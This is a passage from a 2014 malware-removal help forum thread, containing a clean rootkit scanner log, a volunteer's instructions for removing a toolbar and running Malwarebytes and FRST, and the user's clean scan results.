20:47:27.0014 0x1e50  [ ECFEE2F2BA3932C7880D1A8F67D68F91, 57DCD55A518A9FBDEF72B511C643B1062C3F7BD339F4B0FC19E9D84C615B968D ] VMBusHID        C:\windows\System32\drivers\VMBusHID.sys
20:47:27.0014 0x1e50  VMBusHID - ok
20:47:27.0077 0x1e50  [ B8FF4248103E6EA47B9D85C55673ABA3, 4337FA0F0FB5C45BFC42FF17DFAA5DCA394C74BA8283851504AD79F47B69CB0D ] vmicheartbeat   C:\windows\System32\ICSvc.dll
20:47:27.0077 0x1e50  vmicheartbeat - ok
20:47:27.0108 0x1e50  [ B8FF4248103E6EA47B9D85C55673ABA3, 4337FA0F0FB5C45BFC42FF17DFAA5DCA394C74BA8283851504AD79F47B69CB0D ] vmickvpexchange C:\windows\System32\ICSvc.dll
20:47:27.0108 0x1e50  vmickvpexchange - ok
20:47:27.0139 0x1e50  [ B8FF4248103E6EA47B9D85C55673ABA3, 4337FA0F0FB5C45BFC42FF17DFAA5DCA394C74BA8283851504AD79F47B69CB0D ] vmicrdv         C:\windows\System32\ICSvc.dll
20:47:27.0155 0x1e50  vmicrdv - ok
20:47:27.0186 0x1e50  [ B8FF4248103E6EA47B9D85C55673ABA3, 4337FA0F0FB5C45BFC42FF17DFAA5DCA394C74BA8283851504AD79F47B69CB0D ] vmicshutdown    C:\windows\System32\ICSvc.dll
20:47:27.0186 0x1e50  vmicshutdown - ok
20:47:27.0217 0x1e50  [ B8FF4248103E6EA47B9D85C55673ABA3, 4337FA0F0FB5C45BFC42FF17DFAA5DCA394C74BA8283851504AD79F47B69CB0D ] vmictimesync    C:\windows\System32\ICSvc.dll
20:47:27.0233 0x1e50  vmictimesync - ok
20:47:27.0248 0x1e50  [ B8FF4248103E6EA47B9D85C55673ABA3, 4337FA0F0FB5C45BFC42FF17DFAA5DCA394C74BA8283851504AD79F47B69CB0D ] vmicvss         C:\windows\System32\ICSvc.dll
20:47:27.0264 0x1e50  vmicvss - ok
20:47:27.0311 0x1e50  [ CB60FAAED8B49B812EBBF77EB87D9B18, ADA7C68D4C4981555ED48981E8B7ACBEEF5C39F902EB98782FC3DFF495FE0C33 ] volmgr          C:\windows\system32\drivers\volmgr.sys
20:47:27.0311 0x1e50  volmgr - ok
20:47:27.0358 0x1e50  [ A74101DA9809251BCD0E5A26BAE0F824, 15A3A7CC31A13C5882812C344D0937A8A4503D12DB07B9F7F2A8191B739CDBF7 ] volmgrx         C:\windows\system32\drivers\volmgrx.sys
20:47:27.0358 0x1e50  volmgrx - ok
20:47:27.0420 0x1e50  [ 78A5BBA3819FFFC62FFEC3E2220D102D, A95797B97D576374C2CDA8A09E6C51A89BADE428AAA89D5093579C85062E5874 ] volsnap         C:\windows\system32\drivers\volsnap.sys
20:47:27.0436 0x1e50  volsnap - ok
20:47:27.0482 0x1e50  [ A8DA1C1B52ECEA3726DEBED4FF1B700D, 75C024EC3858DF24FB82FE105BDD1E37900D53EFE9D72F42CDDFFD0742525586 ] vpci            C:\windows\System32\drivers\vpci.sys
20:47:27.0482 0x1e50  vpci - ok
20:47:27.0545 0x1e50  [ 38A60CD9C009C55C6D3B5586F8E6A353, 7F7E2AE39F1A0A5245650911E310E0948BC22A18262A16FA76B44A042D66312D ] vsmraid         C:\windows\system32\drivers\vsmraid.sys
20:47:27.0545 0x1e50  vsmraid - ok
20:47:27.0643 0x1e50  [ D0C69E44BC1E1D4AD290FD84104623D8, 4C86760EA4BD2A64FFD42D89284EC3E5048CB2F0F6F3B80D017B41C0D2456A90 ] VSS             C:\windows\system32\vssvc.exe
20:47:27.0675 0x1e50  VSS - ok
20:47:27.0721 0x1e50  [ A0F6FE0FC2F647C22BBFD6BD4249DBCC, AC2F3C70EDCA0AFBB2606267DFE6D3E8E7B0772140153BAD6B0A9EDE6A1D2F29 ] VSTXRAID        C:\windows\system32\drivers\vstxraid.sys
20:47:27.0737 0x1e50  VSTXRAID - ok
20:47:27.0768 0x1e50  [ 62460A45435A26A334907E3F2EA45611, FEF86E05117CC0AAB8211CA1542776EB620BD4699BD590D91F16621ED35B9824 ] vwifibus        C:\windows\System32\drivers\vwifibus.sys
20:47:27.0784 0x1e50  vwifibus - ok
20:47:27.0799 0x1e50  [ 095E943D27025E4D588AF0A72CC2318F, 3CE406A202F93EF8C4BC7317621A672670D734C69166393CA7256D5E5E667041 ] vwififlt        C:\windows\system32\DRIVERS\vwififlt.sys
20:47:27.0815 0x1e50  vwififlt - ok
20:47:27.0831 0x1e50  [ 73FA1A41A97A5C34ADC03B3577FF1A86, CBA4BC0DA837C163587BBB4BF2AC1549C72440307C984D3CDF8995023718136C ] vwifimp         C:\windows\system32\DRIVERS\vwifimp.sys
20:47:27.0831 0x1e50  vwifimp - ok
20:47:27.0877 0x1e50  [ F690B6EEAA94576727B24376D7ED3601, A61EE96024C8FC4058481DFB1E7F0AD746565368672FA3B6BA8F9E23D0F47E4C ] W32Time         C:\windows\system32\w32time.dll
20:47:27.0877 0x1e50  W32Time - ok
20:47:27.0924 0x1e50  [ 6B806E893714019969E2B50D7EF6A4D9, 38FE2B01082DC4C2A0C11A292016A727F48C3DF1293DC3A0216B2254A452263F ] WacomPen        C:\windows\System32\drivers\wacompen.sys
20:47:27.0924 0x1e50  WacomPen - ok
20:47:27.0987 0x1e50  [ 61F6972FF9AC9A8D0B4D62076DC30051, 5A028036461534CA53CB2D6C1D720783D408A9F17FD77AB1ECDD75FBAD9F2381 ] Wanarp          C:\windows\system32\DRIVERS\wanarp.sys
20:47:27.0987 0x1e50  Wanarp - ok
20:47:28.0018 0x1e50  [ 61F6972FF9AC9A8D0B4D62076DC30051, 5A028036461534CA53CB2D6C1D720783D408A9F17FD77AB1ECDD75FBAD9F2381 ] Wanarpv6        C:\windows\system32\DRIVERS\wanarp.sys
20:47:28.0018 0x1e50  Wanarpv6 - ok
20:47:28.0111 0x1e50  [ 42DF22F8C448E7CD219F6D63743505E2, 063F4280C7BD20CE1360436B76A17DFE17FF611F75337A47373D098CC6C263BF ] wbengine        C:\windows\system32\wbengine.exe
20:47:28.0158 0x1e50  wbengine - ok
20:47:28.0236 0x1e50  [ 31D37B2F6069C631EF0557D322924812, 6E18A1060F3C8F4BF220E286C44327866A8F9109E74928AA2D8C2DA9C452038B ] WbioSrvc        C:\windows\System32\wbiosrvc.dll
20:47:28.0236 0x1e50  WbioSrvc - ok
20:47:28.0392 0x1e50  [ AF1349386D4C6786EF4E34FACEF15042, 6B33778409BC54C1955B92508ADDEBAFD629141961B71C94A91DC4CFE8391A13 ] Wcmsvc          C:\windows\System32\wcmsvc.dll
20:47:28.0408 0x1e50  Wcmsvc - ok
20:47:28.0470 0x1e50  [ 5B5FEAB51172F5513C2CF7B39CFA6A01, 4FDAC5168E00D44781C6F5D98ECD4977A12663C5CE6FFDFF9DBC89A28D6212D8 ] wcncsvc         C:\windows\System32\wcncsvc.dll
20:47:28.0486 0x1e50  wcncsvc - ok
20:47:28.0533 0x1e50  [ E19556D414332E2BEBA1F368229006B4, AB3454EC85D7B6E62D44C4510C1547AE7F736558588E54B0E265F7B3A5810E15 ] WcsPlugInService C:\windows\System32\WcsPlugInService.dll
20:47:28.0548 0x1e50  WcsPlugInService - ok
20:47:28.0579 0x1e50  [ B3A4D918DAB90505B6BC7B70632913CB, ECC19DCD7902C29D0682C70B9546CF8B82477A32147EE30EB6750D8499605B46 ] Wd              C:\windows\system32\drivers\wd.sys
20:47:28.0579 0x1e50  Wd - ok
20:47:28.0642 0x1e50  [ 3772FF85F0098686B0DCD77076AE0786, 8B0221F6003C53856676FFD9CDCFF43DF29B410AB2F340C10BB858F0E6EC14CE ] WdBoot          C:\windows\system32\drivers\WdBoot.sys
20:47:28.0642 0x1e50  WdBoot - ok
20:47:28.0735 0x1e50  [ E2C933EDBC389386EBE6D2BA953F43D8, AF1DEADD5F1267CCEBD226E8EEB971D1946EA6A5A9645A36F5D111F758AF2F07 ] Wdf01000        C:\windows\system32\drivers\Wdf01000.sys
20:47:28.0751 0x1e50  Wdf01000 - ok
20:47:28.0845 0x1e50  [ AB6F7DE8BFBF61A42F8764D9A621BD8B, DEFDC9FDC0B234403EE1339105B8D12B486D77B3BA01A703339B5DB8B95FA4D8 ] WdFilter        C:\windows\system32\drivers\WdFilter.sys
20:47:28.0845 0x1e50  WdFilter - ok
20:47:28.0891 0x1e50  [ 240FC332484572227CD1DF82407F33E5, 5210549EC519DD3BCA6BBC995F01E1E3E0988580797E4BD1433F429E0CB30412 ] WdiServiceHost  C:\windows\system32\wdi.dll
20:47:28.0891 0x1e50  WdiServiceHost - ok
20:47:28.0923 0x1e50  [ 240FC332484572227CD1DF82407F33E5, 5210549EC519DD3BCA6BBC995F01E1E3E0988580797E4BD1433F429E0CB30412 ] WdiSystemHost   C:\windows\system32\wdi.dll
20:47:28.0923 0x1e50  WdiSystemHost - ok
20:47:28.0985 0x1e50  [ 9B1384CE8E681D2D77BB3524B8E86311, BDEF9D0A79A7C26A88088A306F91632F300E587736CDD2C64717EC54DD6E89FF ] WebClient       C:\windows\System32\webclnt.dll
20:47:28.0985 0x1e50  WebClient - ok
20:47:29.0047 0x1e50  [ 35FD720943D4FCD75C3275BF062FF140, 9D8345E6DE1AE23F93AD0B52D27D1CCFD69EF7EE50654F92CA999BEC4570A773 ] Wecsvc          C:\windows\system32\wecsvc.dll
20:47:29.0047 0x1e50  Wecsvc - ok
20:47:29.0079 0x1e50  [ 4D2612E3C462B68F499D840B1133263E, 4DDAEB4480AEC31A8184838588E0D3DFA31CE6D2FA6E906926860C75F52DC7B7 ] wercplsupport   C:\windows\System32\wercplsupport.dll
20:47:29.0094 0x1e50  wercplsupport - ok
20:47:29.0157 0x1e50  [ 5F70EBFC1F75B487DE79501E3CCBDB54, 2FCA57BF60A43B03BB42FBF22BBFC19AD2266FBBD818494AD114125E6E433321 ] WerSvc          C:\windows\System32\WerSvc.dll
20:47:29.0172 0x1e50  WerSvc - ok
20:47:29.0219 0x1e50  [ 44BB9C31E6242C4BD1CE7C2B440C2533, E603BB001028918B687818E930340008C752679B133037367A8A8E41DA559FFE ] WFPLWFS         C:\windows\system32\DRIVERS\wfplwfs.sys
20:47:29.0219 0x1e50  WFPLWFS - ok
20:47:29.0266 0x1e50  [ 60E0C220593DA4F7C289CB909D2DBAE0, 057CA7727F748600CC155043081AB9E3244763CF4913F317D13226A515F6FDB6 ] WiaRpc          C:\windows\System32\wiarpc.dll
20:47:29.0266 0x1e50  WiaRpc - ok
20:47:29.0313 0x1e50  [ A3C7624A42A3447EF5EDD1ED37FE4E60, BD8BDF0A571873FA8277878AF7AED11196CFF1B4DF1EA6BA13BD4887D7B63B94 ] WIMMount        C:\windows\system32\drivers\wimmount.sys
20:47:29.0328 0x1e50  WIMMount - ok
20:47:29.0359 0x1e50  WinDefend - ok
20:47:29.0484 0x1e50  [ 7911470B6018059A880469A63B65700A, 4B6131491A028FBCA54AC261112D183EFD42E98160545C8E8DFBDA01C87B3FB5 ] WinHttpAutoProxySvc C:\windows\system32\winhttp.dll
20:47:29.0500 0x1e50  WinHttpAutoProxySvc - ok
20:47:29.0593 0x1e50  [ 3D6B518B71C75C8FA4115A33615C107A, ED7A266013D29D3B1A462464735C3632BEA121D1B32553907AEAA0B00595C3DF ] Winmgmt         C:\windows\system32\wbem\WMIsvc.dll
20:47:29.0598 0x1e50  Winmgmt - ok
20:47:29.0757 0x1e50  [ 8E212A627F33F6FC3B5F3BB47212F66E, 9BBFE26ABFA14F346FE3711D13D959523EEA23608A33C16F3D750D66CA511911 ] WinRM           C:\windows\system32\WsmSvc.dll
20:47:29.0835 0x1e50  WinRM - ok
20:47:29.0929 0x1e50  [ BB20956C424531003F7FA6CD36F11D5D, 2C55F1C7553A527A7C4C34E730BE943269AE23928731C64D3DC945E07AE1771E ] WinUsb          C:\windows\system32\DRIVERS\WinUsb.sys
20:47:29.0929 0x1e50  WinUsb - ok
20:47:30.0022 0x1e50  [ 6351724B8FA0255C2DBD970297F00B93, A02F274479F9F32E30C75A5BD991B008B3CCB47D380D5870563EF918DAC5730E ] WlanSvc         C:\windows\System32\wlansvc.dll
20:47:30.0069 0x1e50  WlanSvc - ok
20:47:30.0209 0x1e50  [ B330CE47FB74A6BE9A3FFFF4B3F64D9B, B76226808406D8B38DE2D3A8CCE633BB507022C8BAAA6C3DAD34204CC6CE1284 ] wlidsvc         C:\windows\system32\wlidsvc.dll
20:47:30.0272 0x1e50  wlidsvc - ok
20:47:30.0303 0x1e50  [ E2A596CACFC6504306CDB7B593B90084, DF89CF57249553CE922C841F18B99A213185FA1099C053B9BB8C0F6E5BC3FEC0 ] WmiAcpi         C:\windows\System32\drivers\wmiacpi.sys
20:47:30.0303 0x1e50  WmiAcpi - ok
20:47:30.0365 0x1e50  [ D113499052C5E541906B727779F0F959, 05FB51086C0A0CE3812A7E6098C5A454ECCFE8553669CFA715153564F2226DB0 ] wmiApSrv        C:\windows\system32\wbem\WmiApSrv.exe
20:47:30.0365 0x1e50  wmiApSrv - ok
20:47:30.0397 0x1e50  WMPNetworkSvc - ok
20:47:30.0459 0x1e50  [ C6FF953D5D6F2EAE3B8883474D5076B3, 001CBB7FBC30209C892869258E5ABD3F0932886E156ECB10DCA599F6D32648BE ] wpcfltr         C:\windows\system32\DRIVERS\wpcfltr.sys
20:47:30.0459 0x1e50  wpcfltr - ok
20:47:30.0506 0x1e50  [ A6ED163169876BFD2437E872FE2F1509, C13E8676800EEEF690F51C4DEA660B36C8734AE2CCAAC48054E10D74B98949B8 ] WPCSvc          C:\windows\System32\wpcsvc.dll
20:47:30.0506 0x1e50  WPCSvc - ok
20:47:30.0568 0x1e50  [ 3013658A4D327854BEEC4A08D9655194, C4CF5AA6A47CC55E7037B0BFE20AE0A6442ADDC5DEB89D6861C98C61851FA821 ] WPDBusEnum      C:\windows\system32\wpdbusenum.dll
20:47:30.0568 0x1e50  WPDBusEnum - ok
20:47:30.0615 0x1e50  [ 0346CAFC181C91C6E2330332EB332ED6, D46F44C339399CAAE13CD71C53A169E95065208E07E5420DE00A4509D6CB056F ] WpdUpFltr       C:\windows\system32\drivers\WpdUpFltr.sys
20:47:30.0615 0x1e50  WpdUpFltr - ok
20:47:30.0677 0x1e50  [ BC8B5CB336E63BB25EAD1CE8EDD34B81, A42759956EDCCC6D0688240AA4F833FB9CA132D42D2D901CDCBB24DCE1788C1D ] ws2ifsl         C:\windows\system32\drivers\ws2ifsl.sys
20:47:30.0677 0x1e50  ws2ifsl - ok
20:47:30.0740 0x1e50  [ 012CFE7F0F95266F554EE3B91EE2128A, 866312F6BF7369BE686F1BA9F01311C99E95E268C6E63BE37C841F54F5AA0DB8 ] wscsvc          C:\windows\System32\wscsvc.dll
20:47:30.0740 0x1e50  wscsvc - ok
20:47:30.0771 0x1e50  [ 74EFDA0526862C3D8D01A776182798EA, 7C9AD6118CB344C63B60A8BA5FA8C85ADED30933821ABD1427857E826EFC2952 ] WSDPrintDevice  C:\windows\System32\drivers\WSDPrint.sys
20:47:30.0771 0x1e50  WSDPrintDevice - ok
20:47:30.0802 0x1e50  WSearch - ok
20:47:30.0943 0x1e50  [ D4D04839F3DFAF09D94BAB1016F7A297, 944A41D251F522EE87189C1D01CF7EEE2C70BF4353BA4005C44F03DB485F843F ] WSService       C:\windows\System32\WSService.dll
20:47:31.0005 0x1e50  WSService - ok
20:47:31.0177 0x1e50  [ 10EA2DBD2820A504D98D19F5EDAAFC04, 5B84D7C169CBAEBCE4A03BB89426E74DBF5AFCA1F8FDE2A5BC1006A8464D7E24 ] wuauserv        C:\windows\system32\wuaueng.dll
20:47:31.0270 0x1e50  wuauserv - ok
20:47:31.0317 0x1e50  [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf          C:\windows\system32\drivers\WudfPf.sys
20:47:31.0317 0x1e50  WudfPf - ok
20:47:31.0364 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd          C:\windows\System32\drivers\WUDFRd.sys
20:47:31.0364 0x1e50  WUDFRd - ok
20:47:31.0379 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFSensorLP    C:\windows\system32\DRIVERS\WUDFRd.sys
20:47:31.0395 0x1e50  WUDFSensorLP - ok
20:47:31.0442 0x1e50  [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc         C:\windows\System32\WUDFSvc.dll
20:47:31.0442 0x1e50  wudfsvc - ok
20:47:31.0473 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFWpdFs       C:\windows\system32\DRIVERS\WUDFRd.sys
20:47:31.0489 0x1e50  WUDFWpdFs - ok
20:47:31.0520 0x1e50  [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFWpdMtp      C:\windows\system32\DRIVERS\WUDFRd.sys
20:47:31.0520 0x1e50  WUDFWpdMtp - ok
20:47:31.0603 0x1e50  [ 6D9E07436B6646EC8F7EFFD39B6BA288, 82C1CEA93ECEF17D221AD0F87C5BD96F3FD8143841C16BD9608BD4D58D90B8E0 ] WwanSvc         C:\windows\System32\wwansvc.dll
20:47:31.0618 0x1e50  WwanSvc - ok
20:47:31.0728 0x1e50  ================ Scan global ===============================
20:47:31.0759 0x1e50  [ DDC1AFBF9DDF880CE9BD3896114D8DED, E2406231EA4D2689A5EDFA9BD1A1BC064359D8D23B37F113A18B5EAE3E2D4050 ] C:\windows\system32\basesrv.dll
20:47:31.0806 0x1e50  [ E9343076AE704D20BB0D01F3AF3EFFEF, FF2CE4146945976F9480690505CECD3C7C719BAF0F633E6192C8272C75EF295D ] C:\windows\system32\winsrv.dll
20:47:31.0837 0x1e50  [ BD7C6949984D19AAA609896B675E7357, 5B46538B27BC70F5A3805AA63F6AACDC780C7168468FB535F2D35CF26B9DEE06 ] C:\windows\system32\sxssrv.dll
20:47:31.0899 0x1e50  [ 8F226143046435C75C033B0C52E90FFE, 54FA316485B57D7B8104FE621F5F40DEC35E3D57C3DF46B5F7EACF57445FE7CA ] C:\windows\system32\services.exe
20:47:31.0915 0x1e50  [ Global ] - ok
20:47:31.0915 0x1e50  ================ Scan MBR ==================================
20:47:31.0915 0x1e50  [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk0\DR0
20:47:31.0930 0x1e50  \Device\Harddisk0\DR0 - ok
20:47:31.0930 0x1e50  ================ Scan VBR ==================================
20:47:31.0930 0x1e50  [ 16D9BDA5561EE8FC3B41738A3E439747 ] \Device\Harddisk0\DR0\Partition1
20:47:31.0946 0x1e50  \Device\Harddisk0\DR0\Partition1 - ok
20:47:32.0024 0x1e50  [ 60CE4EFCEC10370B267155A72546F4E8 ] \Device\Harddisk0\DR0\Partition2
20:47:32.0024 0x1e50  \Device\Harddisk0\DR0\Partition2 - ok
20:47:32.0055 0x1e50  [ F7769F4DFE9FA09660B5AD1485218409 ] \Device\Harddisk0\DR0\Partition3
20:47:32.0071 0x1e50  \Device\Harddisk0\DR0\Partition3 - ok
20:47:32.0071 0x1e50  [ 380873D9693A091881F63A558F86709C ] \Device\Harddisk0\DR0\Partition4
20:47:32.0086 0x1e50  \Device\Harddisk0\DR0\Partition4 - ok
20:47:32.0118 0x1e50  [ EDA8B861449A681919BE6C207F47B7D4 ] \Device\Harddisk0\DR0\Partition5
20:47:32.0118 0x1e50  \Device\Harddisk0\DR0\Partition5 - ok
20:47:32.0133 0x1e50  ================ Scan generic autorun ======================
20:47:32.0211 0x1e50  [ 2D7816ACDA1CC85C873CBC19A4121D58, 3F3E41EBEF81DB8C2A84A8E75D1E4852046A10A5DCB8CCCC2ADF7FD0DC8EEF66 ] C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe
20:47:32.0242 0x1e50  ToshibaAppPlace - ok
20:47:32.0320 0x1e50  [ 38161F642AA7A2882914DDB0E90FF41C, 76236F618A6646BFD286641543E068285B71169FBF44381BB7EE6396EA67EC24 ] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
20:47:32.0352 0x1e50  StartCCC - ok
20:47:32.0617 0x1e50  [ 361B0893A5C6741F347568A3232D2822, A1085FD8DCEA67E3760C5204C4FC0EADAAC2A9E3A1A498B0BE2F0883EE2B1A04 ] C:\Program Files (x86)\AVG\AVG2014\avgui.exe
20:47:32.0742 0x1e50  AVG_UI - ok
20:47:32.0835 0x1e50  [ 94A4D6915D4F572309DF6137E1846528, E46BDF83CAA6683AA655DBA3D2C8DC7AC06251E952466A20CFDA3A16B1840455 ] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
20:47:32.0835 0x1e50  APSDaemon - ok
20:47:32.0913 0x1e50  [ D9FAA5EFEB27DDBE99C720B9069A451E, FD33757E2674915409E54FBDF828DB900E31B99265035B16C216B38C6DBFC15F ] C:\Program Files (x86)\iTunes\iTunesHelper.exe
20:47:32.0913 0x1e50  iTunesHelper - ok
20:47:32.0913 0x1e50  GamingWonderland EPM Support - ok
20:47:33.0007 0x1e50  [ 5183EC20A788D7A78C7B408FDEA6F303, E93956ED56889FC0EA736A1787CF44CE09D21022B12DBDCD47A754EAB5A1A797 ] C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe
20:47:33.0038 0x1e50  Nikon Message Center 2 - ok
20:47:33.0272 0x1e50  [ F7F0714EF964652CAF1CA177722AC6DD, 06C8F8AC796F218473BA002A21AD947B13BE5E235CBAC684B209FA6E8C2DC2DE ] c:\program files (x86)\emsisoft anti-malware\a2guard.exe
20:47:33.0412 0x1e50  emsisoft anti-malware - ok
20:47:33.0412 0x1e50  Waiting for KSN requests completion. In queue: 112
20:47:34.0431 0x1e50  Waiting for KSN requests completion. In queue: 112
20:47:35.0445 0x1e50  Waiting for KSN requests completion. In queue: 112
20:47:36.0496 0x1e50  AV detected via SS2: AVG AntiVirus Free Edition 2014, C:\Program Files (x86)\AVG\AVG2014\avgwsc.exe ( 14.0.0.4765 ), 0x41000 ( enabled : updated )
20:47:36.0496 0x1e50  AV detected via SS2: Emsisoft Anti-Malware, C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2start.exe ( 9.0.0.4570 ), 0x41000 ( enabled : updated )
20:47:36.0527 0x1e50  AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.5.218.0 ), 0x60100 ( disabled : updated )
20:47:36.0542 0x1e50  Win FW state via NFP2: enabled
20:47:39.0126 0x1e50  ============================================================
20:47:39.0126 0x1e50  Scan finished
20:47:39.0126 0x1e50  ============================================================
20:47:39.0126 0x203c  Detected object count: 0
20:47:39.0126 0x203c  Actual detected object count: 0

Thanks for looking at this stuff.



#6 TB-Psychotic

TB-Psychotic

  • Malware Response Team
  • 6,349 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:47 AM

Posted 16 October 2014 - 09:43 AM

We need to remove some programs with Revo Uninstaller Free:


Note: Revo Uninstaller is more thorough in deleting programs on your computer than using the Add/Remove option in Windows. Since it is a more powerful tool, please be sure to follow the instructions carefully.
Note: If the program you want to uninstall is not listed by Revo, let me know and we will try an altenate method of removal.

  • Please download and install Revo Uninstaller Free
    note: there is no need to click anything on that page, the download will start automatically
  • Double click Revo Uninstaller to run it
  • From the list of programs double click on the listed program(s), or anything similar, to remove it:
    GamingWonderland Internet Explorer Toolbar
    7-zip v9.20
    
  • When prompted if you want to uninstall click Yes
  • Be sure the Moderate option is selected then click Next
  • The program will run, If prompted again click Yes
  • When the built-in uninstaller is finished click on Next
  • Once the program has searched for leftovers click Next
  • Check the items in bold only on the list then click Delete
    note: you may have to expand some folders by clicking the "+" mark
  • When prompted click on Yes and then on Next
  • Put a check on any folders that are found and select Delete
  • When prompted select Yes then Next
  • Once done click Finish

 

 

 

 

Full System Scan with Malwarebytes Antimalware
 

  • If not existing, please download Malwarebytes Anti-Malware to your desktop.
  • Double-click the downloaded setup file and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.

If the program is already installed:

  • Run Malwarebytes Antimalware
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.

  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

 

Attached Files


Proud Member of UNITE & TB
 
My help is free, however, if you want to support my fight against malware, click here --> btn_donate_SM.gif <--(no worries, every little bit helps)

#7 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 16 October 2014 - 06:18 PM

Thanks for the help.  It says there are no threats. 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/16/2014
Scan Time: 1:32:19 PM
Logfile: 
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.10.16.06
Rootkit Database: v2014.10.15.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 8
CPU: x64
File System: NTFS
User: Jeremy and Heidi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 337370
Time Elapsed: 14 min, 34 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


#8 TB-Psychotic

TB-Psychotic

  • Malware Response Team
  • 6,349 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:47 AM

Posted 17 October 2014 - 03:05 AM

What about the fixlog?


Proud Member of UNITE & TB
 
My help is free, however, if you want to support my fight against malware, click here --> btn_donate_SM.gif <--(no worries, every little bit helps)

#9 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 17 October 2014 - 05:57 PM

I'm afraid I didn't understand about the fixlog.  In looking at it I don't understand the abbreviations for the paths, except for  the HKU S-1-5-21 entries.  And then do I just delete the settings you noted?



#10 TB-Psychotic

TB-Psychotic

  • Malware Response Team
  • 6,349 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:47 AM

Posted 21 October 2014 - 06:46 AM

Clearly my mistake - I forgot a part of my instruction...! :(

Sorry for that.

 

Fix with FRST (normal mode)

WARNING: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
 

  • Download the attached fixlist.txt and save it to the location where FRST is saved to.
  • Run FRST.exe (on 64bit, run FRST64.exe) and press the Fix button just once and wait.
  • The tool will make a log (Fixlog.txt) which you find where you saved FRST. Please post it to your reply.

 

 

Full System Scan with Malwarebytes Antimalware

  • If not existing, please download Malwarebytes Anti-Malware to your desktop.
  • Double-click the downloaded setup file and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:

    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.

  • Click Finish.


If the program is already installed:
  • Run Malwarebytes Antimalware
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
  • In most cases, a restart will be required.
  • Wait for the prompt to restart the computer to appear, then click on Yes.


  • After the restart once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the scan log which shows the Date and time of the scan just performed.
  • Click 'Copy to Clipboard'
  • Paste the contents of the clipboard into your reply.

Attached Files


Proud Member of UNITE & TB
 
My help is free, however, if you want to support my fight against malware, click here --> btn_donate_SM.gif <--(no worries, every little bit helps)

#11 JeremyAndrew

JeremyAndrew
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:47 PM

Posted 23 October 2014 - 02:23 PM

Thank you.  Here are the logs:

FRST:

(I am sorry, I got impatient and deleted the registry keys that had the java .exe file.  But FRST deleted the entire key that it was part of, so that should be OK)

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 21-10-2014
Ran by Jeremy and Heidi at 2014-10-21 10:53:34 Run:1
Running from C:\FRST
Loaded Profile: Jeremy and Heidi (Available profiles: Jeremy and Heidi)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
